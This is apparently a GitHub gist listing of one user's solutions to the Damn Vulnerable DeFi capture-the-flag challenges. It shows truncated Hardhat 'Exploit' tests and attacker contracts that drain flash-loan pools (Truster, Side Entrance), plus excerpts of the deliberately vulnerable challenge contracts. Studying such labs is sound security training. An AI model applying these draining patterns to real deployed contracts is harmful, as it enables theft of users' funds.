Aditya Dixit az0mb13
👨💻
az0mb13
/ dvd2_1sol.js
Last active
January 21, 2023 16:09
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| this.pool.connect(attacker); | |
| for (i = 1; i <= 10; i ++) { | |
| this.pool.flashLoan(this.receiver.address, 0) | |
| } | |
| console.log(await ethers.provider.getBalance(this.receiver.address)) | |
| }); |
az0mb13
/ dvd2_2sol.js
Created
January 21, 2023 16:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) | |
| this.pool.connect(attacker).flashLoan(this.receiver.address,0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
| /** | |
| * @title TrusterLenderPool |
az0mb13
/ dvd3_ans1.sol
Created
January 22, 2023 17:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract TrusterExploiter { | |
| TrusterLenderPool public immutable pool; | |
| IERC20 public immutable token; | |
| constructor(address _pool, address _token) { | |
| pool = TrusterLenderPool(_pool); | |
| token = IERC20(_token); | |
| } | |
| function attack() external { |
az0mb13
/ dvd3_ans2.js
Created
January 22, 2023 17:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| /** CODE YOUR EXPLOIT HERE */ | |
| const TrusterExploiter = await ethers.getContractFactory("TrusterExploiter", attacker); | |
| this.exploit = await TrusterExploiter.deploy(this.pool.address, this.token.address); | |
| await this.exploit.connect(attacker).attack(); | |
| console.log("Updated pool balance is: ", await this.token.balanceOf(this.pool.address)); | |
| }); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| interface IFlashLoanEtherReceiver { | |
| function execute() external payable; | |
| } | |
| /** |
az0mb13
/ dvd4_ans1.sol
Created
January 26, 2023 15:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract AttackerContract { | |
| SideEntranceLenderPool pool; | |
| address payable attacker; | |
| constructor(address _pool) { | |
| pool = SideEntranceLenderPool(_pool); | |
| attacker = payable(msg.sender); | |
| } | |
| function exploit(uint256 amount) public { |
az0mb13
/ dvd4_ans2.js
Created
January 26, 2023 15:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| const AttackerContract = await ethers.getContractFactory("AttackerContract", attacker); | |
| this.exploit = await AttackerContract.deploy(await this.pool.address); | |
| this.exploit.connect(attacker).exploit(ETHER_IN_POOL); | |
| }); |
az0mb13
/ dvd6_1.sol
Created
January 28, 2023 18:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
| import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol"; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| import "./SimpleGovernance.sol"; | |
| /** | |
| * @title SelfiePool |
az0mb13
/ dvd6_2.sol
Last active
January 28, 2023 18:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| ... | |
| contract SimpleGovernance { | |
| ... | |
| struct GovernanceAction { | |
| address receiver; |